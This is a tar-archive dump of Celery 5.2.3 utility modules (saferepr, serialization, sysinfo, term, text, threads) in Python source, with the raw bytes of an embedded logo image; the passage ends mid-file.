""" stop = set() if not stop else stop monkey_patched = [] if not monkey_patched else monkey_patched for node in cls.mro(): if node in stop: try: value = node.__dict__[attr] module_origin = value.__module__ except (AttributeError, KeyError): pass else: if module_origin not in monkey_patched: return node return if attr in node.__dict__: return node class FallbackContext: """Context workaround. The built-in ``@contextmanager`` utility does not work well when wrapping other contexts, as the traceback is wrong when the wrapped context raises. This solves this problem and can be used instead of ``@contextmanager`` in this example:: @contextmanager def connection_or_default_connection(connection=None): if connection: # user already has a connection, shouldn't close # after use yield connection else: # must've new connection, and also close the connection # after the block returns with create_new_connection() as connection: yield connection This wrapper can be used instead for the above like this:: def connection_or_default_connection(connection=None): return FallbackContext(connection, create_new_connection) """ def __init__(self, provided, fallback, *fb_args, **fb_kwargs): self.provided = provided self.fallback = fallback self.fb_args = fb_args self.fb_kwargs = fb_kwargs self._context = None def __enter__(self): if self.provided is not None: return self.provided context = self._context = self.fallback( *self.fb_args, **self.fb_kwargs ).__enter__() return context def __exit__(self, *exc_info): if self._context is not None: return self._context.__exit__(*exc_info) class getitem_property: """Attribute -> dict key descriptor. The target object must support ``__getitem__``, and optionally ``__setitem__``. Example: >>> from collections import defaultdict >>> class Me(dict): ... deep = defaultdict(dict) ... ... foo = _getitem_property('foo') ... deep_thing = _getitem_property('deep.thing') >>> me = Me() >>> me.foo None >>> me.foo = 10 >>> me.foo 10 >>> me['foo'] 10 >>> me.deep_thing = 42 >>> me.deep_thing 42 >>> me.deep defaultdict(, {'thing': 42}) """ def __init__(self, keypath, doc=None): path, _, self.key = keypath.rpartition('.') self.path = path.split('.') if path else None self.__doc__ = doc def _path(self, obj): return (reduce(lambda d, k: d[k], [obj] + self.path) if self.path else obj) def __get__(self, obj, type=None): if obj is None: return type return self._path(obj).get(self.key) def __set__(self, obj, value): self._path(obj)[self.key] = value ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/saferepr.py0000664000175000017500000002172700000000000017512 0ustar00asifasif00000000000000"""Streaming, truncating, non-recursive version of :func:`repr`. Differences from regular :func:`repr`: - Sets are represented the Python 3 way: ``{1, 2}`` vs ``set([1, 2])``. - Unicode strings does not have the ``u'`` prefix, even on Python 2. - Empty set formatted as ``set()`` (Python 3), not ``set([])`` (Python 2). - Longs don't have the ``L`` suffix. Very slow with no limits, super quick with limits. """ import traceback from collections import deque, namedtuple from decimal import Decimal from itertools import chain from numbers import Number from pprint import _recursion from typing import (Any, AnyStr, Callable, Dict, Iterator, List, Sequence, Set, Tuple) from .text import truncate __all__ = ('saferepr', 'reprstream') #: Node representing literal text. 
#: - .value: is the literal text value #: - .truncate: specifies if this text can be truncated, for things like #: LIT_DICT_END this will be False, as we always display #: the ending brackets, e.g: [[[1, 2, 3, ...,], ..., ]] #: - .direction: If +1 the current level is increment by one, #: if -1 the current level is decremented by one, and #: if 0 the current level is unchanged. _literal = namedtuple('_literal', ('value', 'truncate', 'direction')) #: Node representing a dictionary key. _key = namedtuple('_key', ('value',)) #: Node representing quoted text, e.g. a string value. _quoted = namedtuple('_quoted', ('value',)) #: Recursion protection. _dirty = namedtuple('_dirty', ('objid',)) #: Types that are repsented as chars. chars_t = (bytes, str) #: Types that are regarded as safe to call repr on. safe_t = (Number,) #: Set types. set_t = (frozenset, set) LIT_DICT_START = _literal('{', False, +1) LIT_DICT_KVSEP = _literal(': ', True, 0) LIT_DICT_END = _literal('}', False, -1) LIT_LIST_START = _literal('[', False, +1) LIT_LIST_END = _literal(']', False, -1) LIT_LIST_SEP = _literal(', ', True, 0) LIT_SET_START = _literal('{', False, +1) LIT_SET_END = _literal('}', False, -1) LIT_TUPLE_START = _literal('(', False, +1) LIT_TUPLE_END = _literal(')', False, -1) LIT_TUPLE_END_SV = _literal(',)', False, -1) def saferepr(o, maxlen=None, maxlevels=3, seen=None): # type: (Any, int, int, Set) -> str """Safe version of :func:`repr`. Warning: Make sure you set the maxlen argument, or it will be very slow for recursive objects. With the maxlen set, it's often faster than built-in repr. """ return ''.join(_saferepr( o, maxlen=maxlen, maxlevels=maxlevels, seen=seen )) def _chaindict(mapping, LIT_DICT_KVSEP=LIT_DICT_KVSEP, LIT_LIST_SEP=LIT_LIST_SEP): # type: (Dict, _literal, _literal) -> Iterator[Any] size = len(mapping) for i, (k, v) in enumerate(mapping.items()): yield _key(k) yield LIT_DICT_KVSEP yield v if i < (size - 1): yield LIT_LIST_SEP def _chainlist(it, LIT_LIST_SEP=LIT_LIST_SEP): # type: (List) -> Iterator[Any] size = len(it) for i, v in enumerate(it): yield v if i < (size - 1): yield LIT_LIST_SEP def _repr_empty_set(s): # type: (Set) -> str return f'{type(s).__name__}()' def _safetext(val): # type: (AnyStr) -> str if isinstance(val, bytes): try: val.encode('utf-8') except UnicodeDecodeError: # is bytes with unrepresentable characters, attempt # to convert back to unicode return val.decode('utf-8', errors='backslashreplace') return val def _format_binary_bytes(val, maxlen, ellipsis='...'): # type: (bytes, int, str) -> str if maxlen and len(val) > maxlen: # we don't want to copy all the data, just take what we need. chunk = memoryview(val)[:maxlen].tobytes() return _bytes_prefix(f"'{_repr_binary_bytes(chunk)}{ellipsis}'") return _bytes_prefix(f"'{_repr_binary_bytes(val)}'") def _bytes_prefix(s): return 'b' + s def _repr_binary_bytes(val): # type: (bytes) -> str try: return val.decode('utf-8') except UnicodeDecodeError: # possibly not unicode, but binary data so format as hex. 
try: ashex = val.hex except AttributeError: # pragma: no cover # Python 3.4 return val.decode('utf-8', errors='replace') else: # Python 3.5+ return ashex() def _format_chars(val, maxlen): # type: (AnyStr, int) -> str if isinstance(val, bytes): # pragma: no cover return _format_binary_bytes(val, maxlen) else: return "'{}'".format(truncate(val, maxlen).replace("'", "\\'")) def _repr(obj): # type: (Any) -> str try: return repr(obj) except Exception as exc: stack = '\n'.join(traceback.format_stack()) return f'' def _saferepr(o, maxlen=None, maxlevels=3, seen=None): # type: (Any, int, int, Set) -> str stack = deque([iter([o])]) for token, it in reprstream(stack, seen=seen, maxlevels=maxlevels): if maxlen is not None and maxlen <= 0: yield ', ...' # move rest back to stack, so that we can include # dangling parens. stack.append(it) break if isinstance(token, _literal): val = token.value elif isinstance(token, _key): val = saferepr(token.value, maxlen, maxlevels) elif isinstance(token, _quoted): val = _format_chars(token.value, maxlen) else: val = _safetext(truncate(token, maxlen)) yield val if maxlen is not None: maxlen -= len(val) for rest1 in stack: # maxlen exceeded, process any dangling parens. for rest2 in rest1: if isinstance(rest2, _literal) and not rest2.truncate: yield rest2.value def _reprseq(val, lit_start, lit_end, builtin_type, chainer): # type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...] if type(val) is builtin_type: return lit_start, lit_end, chainer(val) return ( _literal(f'{type(val).__name__}({lit_start.value}', False, +1), _literal(f'{lit_end.value})', False, -1), chainer(val) ) def reprstream(stack, seen=None, maxlevels=3, level=0, isinstance=isinstance): """Streaming repr, yielding tokens.""" # type: (deque, Set, int, int, Callable) -> Iterator[Any] seen = seen or set() append = stack.append popleft = stack.popleft is_in_seen = seen.__contains__ discard_from_seen = seen.discard add_to_seen = seen.add while stack: lit_start = lit_end = None it = popleft() for val in it: orig = val if isinstance(val, _dirty): discard_from_seen(val.objid) continue elif isinstance(val, _literal): level += val.direction yield val, it elif isinstance(val, _key): yield val, it elif isinstance(val, Decimal): yield _repr(val), it elif isinstance(val, safe_t): yield str(val), it elif isinstance(val, chars_t): yield _quoted(val), it elif isinstance(val, range): # pragma: no cover yield _repr(val), it else: if isinstance(val, set_t): if not val: yield _repr_empty_set(val), it continue lit_start, lit_end, val = _reprseq( val, LIT_SET_START, LIT_SET_END, set, _chainlist, ) elif isinstance(val, tuple): lit_start, lit_end, val = ( LIT_TUPLE_START, LIT_TUPLE_END_SV if len(val) == 1 else LIT_TUPLE_END, _chainlist(val)) elif isinstance(val, dict): lit_start, lit_end, val = ( LIT_DICT_START, LIT_DICT_END, _chaindict(val)) elif isinstance(val, list): lit_start, lit_end, val = ( LIT_LIST_START, LIT_LIST_END, _chainlist(val)) else: # other type of object yield _repr(val), it continue if maxlevels and level >= maxlevels: yield f'{lit_start.value}...{lit_end.value}', it continue objid = id(orig) if is_in_seen(objid): yield _recursion(orig), it continue add_to_seen(objid) # Recurse into the new list/tuple/dict/etc by tacking # the rest of our iterable onto the new it: this way # it works similar to a linked list. 
append(chain([lit_start], val, [_dirty(objid), lit_end], it)) break ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/serialization.py0000664000175000017500000001755300000000000020562 0ustar00asifasif00000000000000"""Utilities for safely pickling exceptions.""" import datetime import numbers import sys from base64 import b64decode as base64decode from base64 import b64encode as base64encode from functools import partial from inspect import getmro from itertools import takewhile from kombu.utils.encoding import bytes_to_str, safe_repr, str_to_bytes try: import cPickle as pickle except ImportError: import pickle __all__ = ( 'UnpickleableExceptionWrapper', 'subclass_exception', 'find_pickleable_exception', 'create_exception_cls', 'get_pickleable_exception', 'get_pickleable_etype', 'get_pickled_exception', 'strtobool', ) #: List of base classes we probably don't want to reduce to. unwanted_base_classes = (Exception, BaseException, object) STRTOBOOL_DEFAULT_TABLE = {'false': False, 'no': False, '0': False, 'true': True, 'yes': True, '1': True, 'on': True, 'off': False} def subclass_exception(name, parent, module): """Create new exception class.""" return type(name, (parent,), {'__module__': module}) def find_pickleable_exception(exc, loads=pickle.loads, dumps=pickle.dumps): """Find first pickleable exception base class. With an exception instance, iterate over its super classes (by MRO) and find the first super exception that's pickleable. It does not go below :exc:`Exception` (i.e., it skips :exc:`Exception`, :class:`BaseException` and :class:`object`). If that happens you should use :exc:`UnpickleableException` instead. Arguments: exc (BaseException): An exception instance. loads: decoder to use. dumps: encoder to use Returns: Exception: Nearest pickleable parent exception class (except :exc:`Exception` and parents), or if the exception is pickleable it will return :const:`None`. """ exc_args = getattr(exc, 'args', []) for supercls in itermro(exc.__class__, unwanted_base_classes): try: superexc = supercls(*exc_args) loads(dumps(superexc)) except Exception: # pylint: disable=broad-except pass else: return superexc def itermro(cls, stop): return takewhile(lambda sup: sup not in stop, getmro(cls)) def create_exception_cls(name, module, parent=None): """Dynamically create an exception class.""" if not parent: parent = Exception return subclass_exception(name, parent, module) def ensure_serializable(items, encoder): """Ensure items will serialize. For a given list of arbitrary objects, return the object or a string representation, safe for serialization. Arguments: items (Iterable[Any]): Objects to serialize. encoder (Callable): Callable function to serialize with. """ safe_exc_args = [] for arg in items: try: encoder(arg) safe_exc_args.append(arg) except Exception: # pylint: disable=broad-except safe_exc_args.append(safe_repr(arg)) return tuple(safe_exc_args) class UnpickleableExceptionWrapper(Exception): """Wraps unpickleable exceptions. Arguments: exc_module (str): See :attr:`exc_module`. exc_cls_name (str): See :attr:`exc_cls_name`. exc_args (Tuple[Any, ...]): See :attr:`exc_args`. Example: >>> def pickle_it(raising_function): ... try: ... raising_function() ... except Exception as e: ... exc = UnpickleableExceptionWrapper( ... e.__class__.__module__, ... e.__class__.__name__, ... e.args, ... ) ... pickle.dumps(exc) # Works fine. """ #: The module of the original exception. 
exc_module = None #: The name of the original exception class. exc_cls_name = None #: The arguments for the original exception. exc_args = None def __init__(self, exc_module, exc_cls_name, exc_args, text=None): safe_exc_args = ensure_serializable(exc_args, pickle.dumps) self.exc_module = exc_module self.exc_cls_name = exc_cls_name self.exc_args = safe_exc_args self.text = text super().__init__(exc_module, exc_cls_name, safe_exc_args, text) def restore(self): return create_exception_cls(self.exc_cls_name, self.exc_module)(*self.exc_args) def __str__(self): return self.text @classmethod def from_exception(cls, exc): return cls(exc.__class__.__module__, exc.__class__.__name__, getattr(exc, 'args', []), safe_repr(exc)) def get_pickleable_exception(exc): """Make sure exception is pickleable.""" try: pickle.loads(pickle.dumps(exc)) except Exception: # pylint: disable=broad-except pass else: return exc nearest = find_pickleable_exception(exc) if nearest: return nearest return UnpickleableExceptionWrapper.from_exception(exc) def get_pickleable_etype(cls, loads=pickle.loads, dumps=pickle.dumps): """Get pickleable exception type.""" try: loads(dumps(cls)) except Exception: # pylint: disable=broad-except return Exception else: return cls def get_pickled_exception(exc): """Reverse of :meth:`get_pickleable_exception`.""" if isinstance(exc, UnpickleableExceptionWrapper): return exc.restore() return exc def b64encode(s): return bytes_to_str(base64encode(str_to_bytes(s))) def b64decode(s): return base64decode(str_to_bytes(s)) def strtobool(term, table=None): """Convert common terms for true/false to bool. Examples (true/false/yes/no/on/off/1/0). """ if table is None: table = STRTOBOOL_DEFAULT_TABLE if isinstance(term, str): try: return table[term.lower()] except KeyError: raise TypeError(f'Cannot coerce {term!r} to type bool') return term def _datetime_to_json(dt): # See "Date Time String Format" in the ECMA-262 specification. 
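    # For example (illustrative): an aware ``datetime(2021, 12, 30, 12, 0, 0,
    # 123456, tzinfo=utc)`` becomes ``'2021-12-30T12:00:00.123Z'`` -- the
    # microseconds are truncated to milliseconds and a trailing ``+00:00``
    # offset is rewritten as ``Z``.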
    if isinstance(dt, datetime.datetime):
        r = dt.isoformat()
        if dt.microsecond:
            r = r[:23] + r[26:]
        if r.endswith('+00:00'):
            r = r[:-6] + 'Z'
        return r
    elif isinstance(dt, datetime.time):
        r = dt.isoformat()
        if dt.microsecond:
            r = r[:12]
        return r
    else:
        return dt.isoformat()


def jsonify(obj,
            builtin_types=(numbers.Real, str), key=None,
            keyfilter=None,
            unknown_type_filter=None):
    """Transform object making it suitable for json serialization."""
    from kombu.abstract import Object as KombuDictType
    _jsonify = partial(jsonify, builtin_types=builtin_types, key=key,
                       keyfilter=keyfilter,
                       unknown_type_filter=unknown_type_filter)

    if isinstance(obj, KombuDictType):
        obj = obj.as_dict(recurse=True)

    if obj is None or isinstance(obj, builtin_types):
        return obj
    elif isinstance(obj, (tuple, list)):
        return [_jsonify(v) for v in obj]
    elif isinstance(obj, dict):
        return {
            k: _jsonify(v, key=k) for k, v in obj.items()
            if (keyfilter(k) if keyfilter else 1)
        }
    elif isinstance(obj, (datetime.date, datetime.time)):
        return _datetime_to_json(obj)
    elif isinstance(obj, datetime.timedelta):
        return str(obj)
    else:
        if unknown_type_filter is None:
            raise ValueError(
                f'Unsupported type: {type(obj)!r} {obj!r} (parent: {key})'
            )
        return unknown_type_filter(obj)


def raise_with_context(exc):
    exc_info = sys.exc_info()
    if not exc_info:
        raise exc
    elif exc_info[1] is exc:
        raise
    raise exc from exc_info[1]
celery-5.2.3/celery/utils/static/
celery-5.2.3/celery/utils/static/__init__.py
"""Static files."""
import os


def get_file(*args):
    # type: (*str) -> str
    """Get filename for static file."""
    return os.path.join(os.path.abspath(os.path.dirname(__file__)), *args)


def logo():
    # type: () -> bytes
    """Celery logo image."""
    return get_file('celery_128.png')
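# A minimal usage sketch for the helpers above (illustrative only):
#
#     >>> from celery.utils.static import logo
#     >>> with open(logo(), 'rb') as fh:
#     ...     fh.read(8)     # the PNG signature, b'\x89PNG\r\n\x1a\n'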
celery-5.2.3/celery/utils/static/celery_128.png
[binary data omitted: celery_128.png (Celery logo image)]
celery-5.2.3/celery/utils/sysinfo.py
"""System information utilities."""
import os
from math import ceil

from kombu.utils.objects import cached_property

__all__ = ('load_average', 'df')


if hasattr(os, 'getloadavg'):

    def _load_average():
        return tuple(ceil(l * 1e2) / 1e2 for l in os.getloadavg())

else:  # pragma: no cover
    # Windows doesn't have getloadavg
    def _load_average():
        return (0.0, 0.0, 0.0)


def load_average():
    """Return system load average as a triple."""
    return _load_average()


class df:
    """Disk information."""

    def __init__(self, path):
        self.path = path

    @property
    def total_blocks(self):
        return self.stat.f_blocks * self.stat.f_frsize / 1024

    @property
    def available(self):
        return self.stat.f_bavail * self.stat.f_frsize / 1024

    @property
    def capacity(self):
        avail = self.stat.f_bavail
        used = self.stat.f_blocks - self.stat.f_bfree
        return int(ceil(used * 100.0 / (used + avail) + 0.5))

    @cached_property
    def stat(self):
        return os.statvfs(os.path.abspath(self.path))
celery-5.2.3/celery/utils/term.py
"""Terminals and colors."""
import base64
import codecs
import os
import platform
import sys
from functools import reduce

from celery.platforms import isatty

__all__ = ('colored',)

BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
OP_SEQ = '\033[%dm'
RESET_SEQ = '\033[0m'
COLOR_SEQ = '\033[1;%dm'

IS_WINDOWS = platform.system() == 'Windows'

ITERM_PROFILE = os.environ.get('ITERM_PROFILE')
TERM = os.environ.get('TERM')
TERM_IS_SCREEN = TERM and TERM.startswith('screen')

# tmux requires unrecognized OSC sequences to be wrapped with DCS tmux;
# <sequence> ST, and for all ESCs in <sequence> to be replaced with ESC ESC.
# It only accepts ESC backslash for ST.
_IMG_PRE = '\033Ptmux;\033\033]' if TERM_IS_SCREEN else '\033]'
_IMG_POST = '\a\033\\' if TERM_IS_SCREEN else '\a'


def fg(s):
    return COLOR_SEQ % s


class colored:
    """Terminal colored text.

    Example:
        >>> c = colored(enabled=True)
        >>> print(str(c.red('the quick '), c.blue('brown ', c.bold('fox ')),
        ...       c.magenta(c.underline('jumps over')),
        ...       c.yellow(' the lazy '),
        ...
c.green('dog '))) """ def __init__(self, *s, **kwargs): self.s = s self.enabled = not IS_WINDOWS and kwargs.get('enabled', True) self.op = kwargs.get('op', '') self.names = { 'black': self.black, 'red': self.red, 'green': self.green, 'yellow': self.yellow, 'blue': self.blue, 'magenta': self.magenta, 'cyan': self.cyan, 'white': self.white, } def _add(self, a, b): return str(a) + str(b) def _fold_no_color(self, a, b): try: A = a.no_color() except AttributeError: A = str(a) try: B = b.no_color() except AttributeError: B = str(b) return ''.join((str(A), str(B))) def no_color(self): if self.s: return str(reduce(self._fold_no_color, self.s)) return '' def embed(self): prefix = '' if self.enabled: prefix = self.op return ''.join((str(prefix), str(reduce(self._add, self.s)))) def __str__(self): suffix = '' if self.enabled: suffix = RESET_SEQ return str(''.join((self.embed(), str(suffix)))) def node(self, s, op): return self.__class__(enabled=self.enabled, op=op, *s) def black(self, *s): return self.node(s, fg(30 + BLACK)) def red(self, *s): return self.node(s, fg(30 + RED)) def green(self, *s): return self.node(s, fg(30 + GREEN)) def yellow(self, *s): return self.node(s, fg(30 + YELLOW)) def blue(self, *s): return self.node(s, fg(30 + BLUE)) def magenta(self, *s): return self.node(s, fg(30 + MAGENTA)) def cyan(self, *s): return self.node(s, fg(30 + CYAN)) def white(self, *s): return self.node(s, fg(30 + WHITE)) def __repr__(self): return repr(self.no_color()) def bold(self, *s): return self.node(s, OP_SEQ % 1) def underline(self, *s): return self.node(s, OP_SEQ % 4) def blink(self, *s): return self.node(s, OP_SEQ % 5) def reverse(self, *s): return self.node(s, OP_SEQ % 7) def bright(self, *s): return self.node(s, OP_SEQ % 8) def ired(self, *s): return self.node(s, fg(40 + RED)) def igreen(self, *s): return self.node(s, fg(40 + GREEN)) def iyellow(self, *s): return self.node(s, fg(40 + YELLOW)) def iblue(self, *s): return self.node(s, fg(40 + BLUE)) def imagenta(self, *s): return self.node(s, fg(40 + MAGENTA)) def icyan(self, *s): return self.node(s, fg(40 + CYAN)) def iwhite(self, *s): return self.node(s, fg(40 + WHITE)) def reset(self, *s): return self.node(s or [''], RESET_SEQ) def __add__(self, other): return str(self) + str(other) def supports_images(): return isatty(sys.stdin) and ITERM_PROFILE def _read_as_base64(path): with codecs.open(path, mode='rb') as fh: encoded = base64.b64encode(fh.read()) return encoded if type(encoded) == 'str' else encoded.decode('ascii') def imgcat(path, inline=1, preserve_aspect_ratio=0, **kwargs): return '\n%s1337;File=inline=%d;preserveAspectRatio=%d:%s%s' % ( _IMG_PRE, inline, preserve_aspect_ratio, _read_as_base64(path), _IMG_POST) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/text.py0000664000175000017500000001327000000000000016661 0ustar00asifasif00000000000000"""Text formatting utilities.""" import io import re from collections.abc import Callable from functools import partial from pprint import pformat from textwrap import fill from typing import Any, List, Mapping, Pattern __all__ = ( 'abbr', 'abbrtask', 'dedent', 'dedent_initial', 'ensure_newlines', 'ensure_sep', 'fill_paragraphs', 'indent', 'join', 'pluralize', 'pretty', 'str_to_list', 'simple_format', 'truncate', ) UNKNOWN_SIMPLE_FORMAT_KEY = """ Unknown format %{0} in string {1!r}. Possible causes: Did you forget to escape the expand sign (use '%%{0!r}'), or did you escape and the value was expanded twice? 
(%%N -> %N -> %hostname)? """.strip() RE_FORMAT = re.compile(r'%(\w)') def str_to_list(s): # type: (str) -> List[str] """Convert string to list.""" if isinstance(s, str): return s.split(',') return s def dedent_initial(s, n=4): # type: (str, int) -> str """Remove indentation from first line of text.""" return s[n:] if s[:n] == ' ' * n else s def dedent(s, n=4, sep='\n'): # type: (str, int, str) -> str """Remove indentation.""" return sep.join(dedent_initial(l) for l in s.splitlines()) def fill_paragraphs(s, width, sep='\n'): # type: (str, int, str) -> str """Fill paragraphs with newlines (or custom separator).""" return sep.join(fill(p, width) for p in s.split(sep)) def join(l, sep='\n'): # type: (str, str) -> str """Concatenate list of strings.""" return sep.join(v for v in l if v) def ensure_sep(sep, s, n=2): # type: (str, str, int) -> str """Ensure text s ends in separator sep'.""" return s + sep * (n - s.count(sep)) ensure_newlines = partial(ensure_sep, '\n') def abbr(S, max, ellipsis='...'): # type: (str, int, str) -> str """Abbreviate word.""" if S is None: return '???' if len(S) > max: return ellipsis and (S[:max - len(ellipsis)] + ellipsis) or S[:max] return S def abbrtask(S, max): # type: (str, int) -> str """Abbreviate task name.""" if S is None: return '???' if len(S) > max: module, _, cls = S.rpartition('.') module = abbr(module, max - len(cls) - 3, False) return module + '[.]' + cls return S def indent(t, indent=0, sep='\n'): # type: (str, int, str) -> str """Indent text.""" return sep.join(' ' * indent + p for p in t.split(sep)) def truncate(s, maxlen=128, suffix='...'): # type: (str, int, str) -> str """Truncate text to a maximum number of characters.""" if maxlen and len(s) >= maxlen: return s[:maxlen].rsplit(' ', 1)[0] + suffix return s def pluralize(n, text, suffix='s'): # type: (int, str, str) -> str """Pluralize term when n is greater than one.""" if n != 1: return text + suffix return text def pretty(value, width=80, nl_width=80, sep='\n', **kw): # type: (str, int, int, str, **Any) -> str """Format value for printing to console.""" if isinstance(value, dict): return f'{{{sep} {pformat(value, 4, nl_width)[1:]}' elif isinstance(value, tuple): return '{}{}{}'.format( sep, ' ' * 4, pformat(value, width=nl_width, **kw), ) else: return pformat(value, width=width, **kw) def match_case(s, other): # type: (str, str) -> str return s.upper() if other.isupper() else s.lower() def simple_format(s, keys, pattern=RE_FORMAT, expand=r'\1'): # type: (str, Mapping[str, str], Pattern, str) -> str """Format string, expanding abbreviations in keys'.""" if s: keys.setdefault('%', '%') def resolve(match): key = match.expand(expand) try: resolver = keys[key] except KeyError: raise ValueError(UNKNOWN_SIMPLE_FORMAT_KEY.format(key, s)) if isinstance(resolver, Callable): return resolver() return resolver return pattern.sub(resolve, s) return s def remove_repeating_from_task(task_name, s): # type: (str, str) -> str """Given task name, remove repeating module names. Example: >>> remove_repeating_from_task( ... 'tasks.add', ... 'tasks.add(2, 2), tasks.mul(3), tasks.div(4)') 'tasks.add(2, 2), mul(3), div(4)' """ # This is used by e.g. repr(chain), to remove repeating module names. # - extract the module part of the task name module = str(task_name).rpartition('.')[0] + '.' return remove_repeating(module, s) def remove_repeating(substr, s): # type: (str, str) -> str """Remove repeating module names from string. 
Arguments: task_name (str): Task name (full path including module), to use as the basis for removing module names. s (str): The string we want to work on. Example: >>> _shorten_names( ... 'x.tasks.add', ... 'x.tasks.add(2, 2) | x.tasks.add(4) | x.tasks.mul(8)', ... ) 'x.tasks.add(2, 2) | add(4) | mul(8)' """ # find the first occurrence of substr in the string. index = s.find(substr) if index >= 0: return ''.join([ # leave the first occurrence of substr untouched. s[:index + len(substr)], # strip seen substr from the rest of the string. s[index + len(substr):].replace(substr, ''), ]) return s StringIO = io.StringIO _SIO_write = StringIO.write _SIO_init = StringIO.__init__ class WhateverIO(StringIO): """StringIO that takes bytes or str.""" def __init__(self, v=None, *a, **kw): _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw) def write(self, data): _SIO_write(self, data.decode() if isinstance(data, bytes) else data) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/threads.py0000664000175000017500000002257000000000000017332 0ustar00asifasif00000000000000"""Threading primitives and utilities.""" import os import socket import sys import threading import traceback from contextlib import contextmanager from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX from celery.local import Proxy try: from greenlet import getcurrent as get_ident except ImportError: # pragma: no cover try: from _thread import get_ident except ImportError: try: from thread import get_ident except ImportError: # pragma: no cover try: from _dummy_thread import get_ident except ImportError: from dummy_thread import get_ident __all__ = ( 'bgThread', 'Local', 'LocalStack', 'LocalManager', 'get_ident', 'default_socket_timeout', ) USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS') @contextmanager def default_socket_timeout(timeout): """Context temporarily setting the default socket timeout.""" prev = socket.getdefaulttimeout() socket.setdefaulttimeout(timeout) yield socket.setdefaulttimeout(prev) class bgThread(threading.Thread): """Background service thread.""" def __init__(self, name=None, **kwargs): super().__init__() self.__is_shutdown = threading.Event() self.__is_stopped = threading.Event() self.daemon = True self.name = name or self.__class__.__name__ def body(self): raise NotImplementedError() def on_crash(self, msg, *fmt, **kwargs): print(msg.format(*fmt), file=sys.stderr) traceback.print_exc(None, sys.stderr) def run(self): body = self.body shutdown_set = self.__is_shutdown.is_set try: while not shutdown_set(): try: body() except Exception as exc: # pylint: disable=broad-except try: self.on_crash('{0!r} crashed: {1!r}', self.name, exc) self._set_stopped() finally: sys.stderr.flush() os._exit(1) # exiting by normal means won't work finally: self._set_stopped() def _set_stopped(self): try: self.__is_stopped.set() except TypeError: # pragma: no cover # we lost the race at interpreter shutdown, # so gc collected built-in modules. pass def stop(self): """Graceful shutdown.""" self.__is_shutdown.set() self.__is_stopped.wait() if self.is_alive(): self.join(THREAD_TIMEOUT_MAX) def release_local(local): """Release the contents of the local for the current context. This makes it possible to use locals without a manager. With this function one can release :class:`Local` objects as well as :class:`StackLocal` objects. 
However it's not possible to release data held by proxies that way, one always has to retain a reference to the underlying local object in order to be able to release it. Example: >>> loc = Local() >>> loc.foo = 42 >>> release_local(loc) >>> hasattr(loc, 'foo') False """ local.__release_local__() class Local: """Local object.""" __slots__ = ('__storage__', '__ident_func__') def __init__(self): object.__setattr__(self, '__storage__', {}) object.__setattr__(self, '__ident_func__', get_ident) def __iter__(self): return iter(self.__storage__.items()) def __call__(self, proxy): """Create a proxy for a name.""" return Proxy(self, proxy) def __release_local__(self): self.__storage__.pop(self.__ident_func__(), None) def __getattr__(self, name): try: return self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) def __setattr__(self, name, value): ident = self.__ident_func__() storage = self.__storage__ try: storage[ident][name] = value except KeyError: storage[ident] = {name: value} def __delattr__(self, name): try: del self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) class _LocalStack: """Local stack. This class works similar to a :class:`Local` but keeps a stack of objects instead. This is best explained with an example:: >>> ls = LocalStack() >>> ls.push(42) >>> ls.top 42 >>> ls.push(23) >>> ls.top 23 >>> ls.pop() 23 >>> ls.top 42 They can be force released by using a :class:`LocalManager` or with the :func:`release_local` function but the correct way is to pop the item from the stack after using. When the stack is empty it will no longer be bound to the current context (and as such released). By calling the stack without arguments it will return a proxy that resolves to the topmost item on the stack. """ def __init__(self): self._local = Local() def __release_local__(self): self._local.__release_local__() def _get__ident_func__(self): return self._local.__ident_func__ def _set__ident_func__(self, value): object.__setattr__(self._local, '__ident_func__', value) __ident_func__ = property(_get__ident_func__, _set__ident_func__) del _get__ident_func__, _set__ident_func__ def __call__(self): def _lookup(): rv = self.top if rv is None: raise RuntimeError('object unbound') return rv return Proxy(_lookup) def push(self, obj): """Push a new item to the stack.""" rv = getattr(self._local, 'stack', None) if rv is None: # pylint: disable=assigning-non-slot # This attribute is defined now. self._local.stack = rv = [] rv.append(obj) return rv def pop(self): """Remove the topmost item from the stack. Note: Will return the old value or `None` if the stack was already empty. """ stack = getattr(self._local, 'stack', None) if stack is None: return None elif len(stack) == 1: release_local(self._local) return stack[-1] else: return stack.pop() def __len__(self): stack = getattr(self._local, 'stack', None) return len(stack) if stack else 0 @property def stack(self): # get_current_worker_task uses this to find # the original task that was executed by the worker. stack = getattr(self._local, 'stack', None) if stack is not None: return stack return [] @property def top(self): """The topmost item on the stack. Note: If the stack is empty, :const:`None` is returned. """ try: return self._local.stack[-1] except (AttributeError, IndexError): return None class LocalManager: """Local objects cannot manage themselves. For that you need a local manager. 
You can pass a local manager multiple locals or add them later by appending them to ``manager.locals``. Every time the manager cleans up, it will clean up all the data left in the locals for this context. The ``ident_func`` parameter can be added to override the default ident function for the wrapped locals. """ def __init__(self, locals=None, ident_func=None): if locals is None: self.locals = [] elif isinstance(locals, Local): self.locals = [locals] else: self.locals = list(locals) if ident_func is not None: self.ident_func = ident_func for local in self.locals: object.__setattr__(local, '__ident_func__', ident_func) else: self.ident_func = get_ident def get_ident(self): """Return context identifier. This is the identifier the local objects use internally for this context. You cannot override this method to change the behavior but use it to link other context local objects (such as SQLAlchemy's scoped sessions) to the Werkzeug locals. """ return self.ident_func() def cleanup(self): """Manually clean up the data in the locals for this context. Call this at the end of the request or use ``make_middleware()``. """ for local in self.locals: release_local(local) def __repr__(self): return '<{} storages: {}>'.format( self.__class__.__name__, len(self.locals)) class _FastLocalStack(threading.local): def __init__(self): self.stack = [] self.push = self.stack.append self.pop = self.stack.pop super().__init__() @property def top(self): try: return self.stack[-1] except (AttributeError, IndexError): return None def __len__(self): return len(self.stack) if USE_FAST_LOCALS: # pragma: no cover LocalStack = 